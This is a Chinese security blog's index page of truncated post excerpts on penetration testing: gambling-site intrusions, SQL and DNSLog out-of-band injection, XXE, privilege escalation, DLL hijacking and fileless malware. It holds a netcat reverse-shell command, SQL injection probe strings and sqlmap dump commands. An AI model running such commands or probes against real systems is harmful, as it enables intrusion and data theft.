TypechoJoeTheme

Harvey

统计
登录
用户名
密码
/
注册
用户名
邮箱
搜索到 14 篇与 渗透 的结果
2021-01-09

从代码审计到拿下某菠菜客服站

从代码审计到拿下某菠菜客服站
起 因给的目标只有一个后台系统登陆页面。上去就是一个弱口令怼他,但这种菠菜站基本不可能。这时候就要体现信息搜集的重要性了,毕竟渗透最重要的就是信息搜集,废话也不多说,这个过程有点漫长,直接上主菜吧正 文利用fofa、shdan、微步、超级ping进行域名查ip,以及ip反查域名。得到其中一个客服站该站有存储型xss,打进去后返回的全是安卓手机,遂放弃。直接套客服话,有点久远这里就没得图了,通过客服给出的信息,直接批量扫c端同宝塔端口。再ip反查域名得到另一客服站通过目录扫描,发现有install.php文件。好家伙,直接告诉了我是什么客服系统,google一搜,开源的,直接下下来审计一波。放入seay自动审计一波,打开一看,经验多的一看就知道是thinkphp框架。根据安装教程,得知此系统需要绑定到public目录,根据thinkphp的路由规则,web能访问到的目录只有application了。审计过程有点漫长,此处省略。直接上找到的漏洞函数。通过全局搜索upload,发现该函数存在一个黑名单过滤。该函数以文件名中的点来分割名字并存入数组中,且以数组的第二个为后缀。即当文件名为...
Harvey
2021-01-09

渗透,Gamma实验室

30 阅读
0 评论
2021年01月09日
30 阅读
0 评论
2020-12-31

记一次菠菜站对护卫神的利用

记一次菠菜站对护卫神的利用
因为这个站是几个月前日的了,所以图片可能不全,也没办法再补图。写这篇文章的时候,隔壁情侣正在鼓掌,声音贼响,导致我写的东西可能没有过一遍脑子,写的可能有点混乱。另外值得一提的是,为啥我们做安全的经常隔壁碰到这种人?已知目标网站之前客户有给过这种网站,所以我记忆尤深,针对这种站一般你可以直接放弃正常测试流程了,因为经验告诉我,网站主站功能基本上很少有漏洞的,只能从旁站下手。Ctrl+u查看一波没发现有什么存在泄漏的js,回过头发现发现网站右上角有个优惠活动大厅打开后页面似曾相识随便点开一个活动,好像可以随便提交文字,没有过滤,我信心满满输入xss,提交,然而两天过去了,并没什么叼用,我当时的心情真是像云像雾又像雨。然而我又发现下面有个审核进度查询,打开后会让你输入用户名,既然有输入用户名,那应该就是有带入数据库查询,习惯性加了个’点击查询,10秒过去了,没响应,我懵了,输入正常不存在的账号测试,是会弹出记录的,但是加单引号查询却一点响应都没有。F12-network抓包,发现是有发送请求的,很明显了,有注入,而且报错是页面是thinkphp,从最下角看版本是3.2.3,这个版本真的...
Harvey
2020-12-31

渗透,Gamma实验室

32 阅读
0 评论
2020年12月31日
32 阅读
0 评论
2020-12-05

记录某博彩网站渗透

记录某博彩网站渗透
最初,我得到的只有一个后台网址,深深吸了口烟,可攻击点太少了。如果没有弱口令,注入,和直接rce的点,是很难打开缺口的所以首先第一步要做的事情进行信息搜集了!渗透的本质是信息收集的在网络空间安全搜索引擎fofa上查询一下,再就是端口扫描 ,直接略过,懂的都懂。有利用价值的端口:80,81,1433,3389脆弱点:http://49.xxx.xx.xxx:81/Login/index但是通过一段常规操作操作后,发现后台登录界面存在堆叠注入!且获得如下信息:SQL注入post包(在响应包中得到ASP.NET+Microsoft-IIS/7.5)权限:SA刚开始得到注入就想着进入后台看看,但是没有回显,就肝了一段时间的py脚本。得到密码进入后台,模板千篇一律,无数据备份,无修改模板,上传个人判断基于白名单,有编辑器不过示例代码已删除,留言板不可留言,回过头来又看注入,既然是堆叠注入,那就可以执行SQL语句,然后一顿操作,嗯嗯嗯… 没有回显,代码如下:以为到这里就结束了,没想到 3389端口登录失败,1433端口连接失败!这里我很懵,经过大佬的一番指导,可以把注入信息通过外带DNSLl...
Harvey
2020-12-05

渗透,Gamma实验室

28 阅读
0 评论
2020年12月05日
28 阅读
0 评论
2020-11-11

来自上古的提权技术-通配符注入

来自上古的提权技术-通配符注入
前言:正如标题所说,此技术很早以前就有了,但是其中一些利用思路也值得我们借鉴,因为网站运维人员或管理员,经常会备份网站,以及设置一些定时任务来优化网站管理,所有这项攻击技术,我们也会经常用到。基础知识在shell终端中,我们经常用通配符来偷懒,来匹配我们想要的内容,无论是文件还是目录,都适用。认识部分通配符:* 匹配任意多个字符 ? 代表任意单个字符 [ ] 代表“[”和“]”之间的某一个字符,比如[0-9]可以代表0-9之间的任意一个数字,[a-zA-Z]可以代表a-z和A-Z之间的任意一个字母,字母区分大小写。 – 代表一个字符。 ~ 用户的根目录。通配符劫持的第一次利用-chown命令扩展(chown劫持)如果你对Linux/Unix系统稍微了解过,就知道,在系统下,一切皆文件,而文件也会属于某个用户,某个组,也会相应的文件操作的权限,可读可写可执行。而chown命令则可以更改文件的这些属性,详情可以查看linux命令手册。其中我们重点关注 --reference=RFILE 选项我们来看看它自己给的解释use RFILE's owner and group rather...
Harvey
2020-11-11

渗透,Gamma实验室

25 阅读
0 评论
2020年11月11日
25 阅读
0 评论
2020-11-04

共享对象注入

共享对象注入
“如何在不解密的情况下,破解SSL的明文数据?那当然是不要让明文加密了!逻辑鬼才不容反驳”首先,我们得了解一下基础知识程序库可分三类:静态库,共享库和动态加载库静态库,是在执行程序运行前就已经加入到执行码中,在物理上成为执行程序的一部分;共享库,是在执行程序启动时被加载到执行程序中,这样的库可以被多个执行程序共享使用。动态加载库,其实并不是一种真正的库类型,应该是一种库的使用技术,应用程序可以在运行过程中随时加载和使用库。总的来说,可执行文件加载库的方式有两种:动态加载,静态写入第一种库加载方式,是指程序在启动时才会动态调用库函数以及一些功能。第二种库直接就加载写入到可执行文件源代码,所以这样的可执行文件一般都很大。补充(小课堂):加载时间:软件在运行之前,它需要一定的加载时间,用来加载库,和加载到内存。函数倒挂:是指用于拦截对现有函数的调用并对其进行环绕以在运行时修改函数行为的一系列技术。通俗一点,在函数调用时强行增加一个我们能控制的环节!两种加载方式各有优缺点,今天我们要讲的是动态加载共享库的一些骚操作!程序加载时的函数劫持我们拿到一个程序可以先看看它所调用的函数及功能,在l...
Harvey
2020-11-04

渗透,Gamma实验室

26 阅读
0 评论
2020年11月04日
26 阅读
0 评论
2020-10-25

sql注入-联合查询总结

sql注入-联合查询总结
联合查询注入利用的条件:页面上有显示位联合注入的过程:1、判断注入点 2、判断是整型还是字符型 3、判断查询列数 4、判断显示位 5、获取所有数据库名 6、获取数据库所有表名 7、获取字段名 8、获取字段中的数据 数据库判断:1.用@@datadir查看数据库安装目录,能否判断出2.通过各个数据库特有的数据表来判断: mssql:and (select count(*) from sysobjects)>0 and 1=1 Accese:and (select count(*) from msysobjects)>0 and 1=1 mysql:and (select count(*) from information_schema.TABLES)>0 and 1=1 oracle:and (select count(*) from sys.user_tables)>0 and 1=1终极法宝 :报错信息!!!!!!!!!!mysql注入:注入判断: ' " And 1=1 ...
Harvey
2020-10-25

渗透,Gamma实验室

24 阅读
0 评论
2020年10月25日
24 阅读
0 评论
2020-10-20

当输入getsystem会发生什么?

当输入getsystem会发生什么?
“Meterpreter的getsystem命令是非常nice的!在输入getsystem的命令之后,Meterpreter就会神奇的将权限从本地管理员提升为SYSTEM用户。”{mtitle}到底发生了什么事?{/mtitle}getsystem命令包含有三种技术,前两个基于命名管道模拟,最后一个依靠令牌复制。 meterpreter > getsystem -h Usage: getsystem [options] Attempt to elevate your privilege to that of local system. OPTIONS: -h Help Banner. -t The technique to use. (Default to '0'). 0 : All techniques available 1 : Service - Named Pipe Impersonation (In Memory/Admin)...
Harvey
2020-10-20

渗透,Gamma实验室

24 阅读
0 评论
2020年10月20日
24 阅读
0 评论
2020-10-20

数据库DNSLog外带注入-总结

数据库DNSLog外带注入-总结
sql注入中利用的骚姿势你又知道几个?DNSLog外带注入和DNSlog带外注入?(OOB)其实是一样的,叫法不同!本人还是习惯叫外带注入,自我感觉,比较顺口为什么需要外带注入?当我们对一个数据库进行注入时,无回显,且无法进行时间注入,那么就可以利用一个通道,把查询到数据通过通道带出去,这里的通道包括:http请求、DNS解析、SMB服务等将数据带出。of course!这里主讲DNSlog外带注入mysql-DNSlog外带注入:利用条件1.mysql.ini中secure_file_priv必须为空。(PS:修改mysql.ini文件,在[mysqld]下加入secure_file_priv=) mysql 新版本下secure-file-priv字段 :secure-file-priv参数是用来限制LOAD DATA, SELECT ... OUTFILE, and LOAD_FILE()传到哪个指定目录的。 当secure_file_priv的值为null ,表示限制mysqld 不允许导入|导出 当secure_file_pri...
Harvey
2020-10-20

渗透,Gamma实验室

21 阅读
0 评论
2020年10月20日
21 阅读
0 评论
2020-10-20

一文学懂XXE漏洞,从0到1

一文学懂XXE漏洞,从0到1
第一阶段(浅谈XML)初识XML一个好的代码基础能帮助你更好理解一类漏洞,所以先学习一下XML的基础知识。XML被设计为传输和存储数据,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具,简单来说XML主要是面向传输的。什么是XML?XML 指可扩展标记语言(EXtensible Markup Language)XML 是一种标记语言,很类似 HTMLXML 的设计宗旨是传输数据,而非显示数据XML 标签没有被预定义。您需要自行定义标签XML 被设计为具有自我描述性XML 是 W3C 的推荐标准与HTML的对比XML 不是 HTML 的替代XML 和 HTML 为不同的目的而设计XML 被设计为传输和存储数据,其焦点是数据的内容HTML 被设计用来显示数据,其焦点是数据的外观HTML 旨在显示信息,而 XML 旨在传输信息XML文档结构XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。请看示例: <!--XML申明--> <?xml version="1.0"?> <...
Harvey
2020-10-20

Gamma实验室,漏洞exp-poc

21 阅读
0 评论
2020年10月20日
21 阅读
0 评论
2020-10-19

内网渗透-信息收集

内网渗透-信息收集
前言:内网渗透的本质,是信息收集!,信息收集这一环节其实贯穿了整个内网渗透!01-立足点:Foothold,就是我们拿到内网中一台主机权限,作为内网渗透的突破口,我们所有的操作,包括流量转发,端口扫描,漏扫等操作,都会利用此主机为我们搭桥铺路,为以后的内网横向打下坚实的基础。02-立足点的信息收集立足点信息收集包括:OS、权限、内网IP段、杀软、端口、服务、补丁更新频率、网络连接、共享、会话等注:如果是域内主机,OS、应用软件、补丁、服务、杀软这些一般都是批量安装的。{mtitle}前方干货来袭,注意注意!{/mtitle}1.查询网络配置命令: Windows: ipconfig /all Linux: ifconfig /all cat /etc/resolv.conf cat /etc/sysconfig/network cat /etc/networks2.查询操作系统及软件的信息1)查看操作系统和版本信息 windows:...
Harvey
2020-10-19

渗透,Gamma实验室

25 阅读
0 评论
2020年10月19日
25 阅读
0 评论
2020-10-19

Hacker必备技能-反向shell进阶

Hacker必备技能-反向shell进阶
这是一篇对于实战很有用的文章,因为实战不比靶场环境,会有各种运维人员和其他维护者设置的障碍,就算找到漏洞,拿到shell也不是那么轻松,本文将介绍一些在linux上的应对之法,帮助你更好的hacker。01-文章背景在正常的渗透测试过程中,很多工具的定义是死的,但用法是灵活多变的,这完全取决于你的创造力!我个人认为hacker精神最核心的就是创造力,你的上限完全取决于你的想象。我希望这篇文章能对你有所启示,不居于传统思想约束。不扯蛋了,上才艺吧,众所周知,linux系统是服务器首选的系统,所以我们在日常渗透测试众遇到最多的也是基于linux的各种发行版,他们都有一个特点就是会内置一个网络工具netcat,这玩意不得了,功能十分强大,被称为安全界的瑞士军刀,确实好用!02-得到启示正常情况下,我们会在有漏洞的服务器执行这样的命令:nc -e /bin/bash <接受shell的ip> <端口>攻击机:nc -nlvp <端口>至此我们将获得一个很nice的shell,shell的权限取决于执行nc的权限。但是如果 -e 参数不可以用了,你...
Harvey
2020-10-19

渗透,Gamma实验室

25 阅读
0 评论
2020年10月19日
25 阅读
0 评论
2020-10-19

hacker必会技能!

hacker必会技能!
“无文件恶意软件是一种操作及其简单但又及其危险的威胁,它能使某些网络防御无效。”背景资料:网络安全公司CrowdStrike发布了《2020全球威胁态势报告》,其研究结果显示“无文件恶意软件”攻击的趋势增加,无文件恶意软件的攻击数量超过了恶意软件的攻击数量。2019年,51%的攻击使用了无文件恶意软件技术,而在2018年,只有40%的攻击使用了无文件恶意软件技术。“可以看到无文件恶意软件攻击将会成为以后主流攻击手段,这也让防御方更加头疼!”优点:恶意软件攻击定义为:有恶意文件被写入磁盘,导致会被防护产品检测到试图运行该文件,然后识别或阻止它,这些入侵尝试相对来说比较容易拦截和阻止,通常可以用传统的反恶意软件解决方案有效地阻止。恶意软件攻击定义为:初始没有文件或文件片段被写入磁盘的攻击,例如包括代码从内存执行的攻击、或者利用盗取的凭证使用已知工具进行远程登录的攻击,需要更广泛更复杂的检测技术来可靠地识别和拦截,包括行为检测和人类威胁捕获但是什么是无文件恶意软件。“可以看到无文件恶意软件攻击最大的优点是,一次攻击将不会再执行的.exe或类似的东西,而是直接ARM运行有效载荷!”Pow...
Harvey
2020-10-19

渗透,Gamma实验室

21 阅读
0 评论
2020年10月19日
21 阅读
0 评论
2020-10-19

什么是DLL劫持

什么是DLL劫持
Windows在其基础体系结构中具有DLL的搜索路径(加载DLL文件要遵循目录查找优先级)。如果你可以找出没有绝对路径的可执行文件请求的DLL(触发此搜索过程),则可以将攻击代码的DLL放置在搜索路径的更高位置,以便在实际版本之前找到它,并且Windows会毫不犹豫将攻击代码提供给应用程序。让我们假设Windows的DLL搜索路径如下所示:A目录:<-可执行文件的当前工作目录,最高优先级,首先检查 B目录:\Windows C目录:\ Windows \ system32 D目录:\ Windows \ syswow64 <-最低优先级,最后检查这时候,可执行文件“ Foo.exe”请求加载“ bar.dll”,该文件恰好位于syswow64(D)子目录中。这使您有机会将恶意版本放置在A目录,B目录或C目录中,并将其加载到可执行文件中。如前所述,即使您可以用自己的版本替换DLL,即使是绝对的完整路径也无法防止这种情况。Microsoft Windows使用Windows文件保护机制来保护System32之类的系统路径,但是在企业解决方案中保护可执行文件免受DLL劫持的...
Harvey
2020-10-19

渗透,Gamma实验室

20 阅读
0 评论
2020年10月19日
20 阅读
0 评论
2020-10-18

I春秋渗透训练总结

I春秋渗透训练总结
成绩单Burp抓包另存为sql.txt放置d盘打开SQLMap执行以下命令sqlmap.py -r d:\sql.txt -p id --current-db // -p 指定参数 -r 加载一个文件 --current 获取当前数据库名称 获得名称 skctf_flagsqlmap.py -r d:\sql.txt -p id -D skctf_flag --tables //-D 指点数据库名称 --tables 列出数据库中的表 得到数据库名称 fl4g和scsqlmap.py -r d:\sql.txt -p id -D skctf_flag -T fl4g --columns //-t 指定表名称 --columns 列出表中的字段 得到skctf_flagsqlmap.py -r d:\sql.txt -p id -D skctf_flag -T fl4g c skctf_flag --dump // --dump列出字段数据得到flag字符?正则?die函数输出一条消息后并且推出当前脚本。是exit函数的别名...
Harvey
2020-10-18

水文,笔记

23 阅读
0 评论
2020年10月18日
23 阅读
0 评论
Harvey
最怕碌碌无为还叹平凡可贵
98 文章数
9 评论量

人生倒计时

今日已经过去小时
这周已经过去
本月已经过去
今年已经过去个月

标签云

微博热搜榜

  • 获取失败!

今日天气